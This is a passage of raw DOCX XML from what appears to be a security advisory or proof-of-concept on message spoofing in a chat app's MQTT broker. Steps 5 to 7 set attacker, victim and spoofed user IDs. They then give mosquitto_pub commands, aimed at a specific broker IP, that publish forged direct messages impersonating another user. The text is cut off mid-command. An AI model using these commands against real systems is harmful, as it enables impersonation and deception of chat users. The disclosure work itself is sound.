      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>User signed successfully.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ease</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>understanding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>steps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>variables with the relevant user IDs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ATTACKER_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"e16ee31e-9aea-44c2-abdb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>57d1f3473b01" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export VICTIM_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"e965dd5f-8df8-4478-b51c-f3ac82fac134"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export SPOOFED_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"58ac0b67-bb4f-459e-9b82-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4b67c81abf3c"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>normal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>terminal,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ATTACKER_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>publish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>next messages. This sends a normal direct message from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ATTACKER_ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VICTIM_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mosquitto_pub -h 3.131.221.30 -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"$ATTACKER_ID"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ATTACKER_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bf/'$ATTACKER_ID'/'$VICTIM_ID'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"id":"e480eb8c-7bdd-41ed-b9fe-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4285d4288d00","message":"{\"payload\":{\"createdOn\":16 72417105535,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderId\":\"'$ATTACKER_ID'\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,\"message\":\"from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+12012987481\",\"receiverNickname\":\"oscarm\",\"receiverAvatar\":7,\"receiverName\":\" Oscar\",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderNickname\":\"oscarand\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,\"receiverId\":\"'$VICTIM_ID'\",\"dateSent\":16 72417105535,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderName\":\"oscaraa\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,\"status\":2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderAvatar\":1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},\"uuid\":\"e480 eb8c-7bdd-44ed-b9fe-4285d4288d00\"}","timestamp":1672417105535}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="252"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>spoofed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following command sends a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>spoofed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ATTACKER_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>VICTIM_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, impersonating the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>SPOOFED_ID </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user, while also changing the user name and avatar in the chat screen:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mosquitto_pub -h 3.131.221.30 -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"$ATTACKER_ID"</w:t>
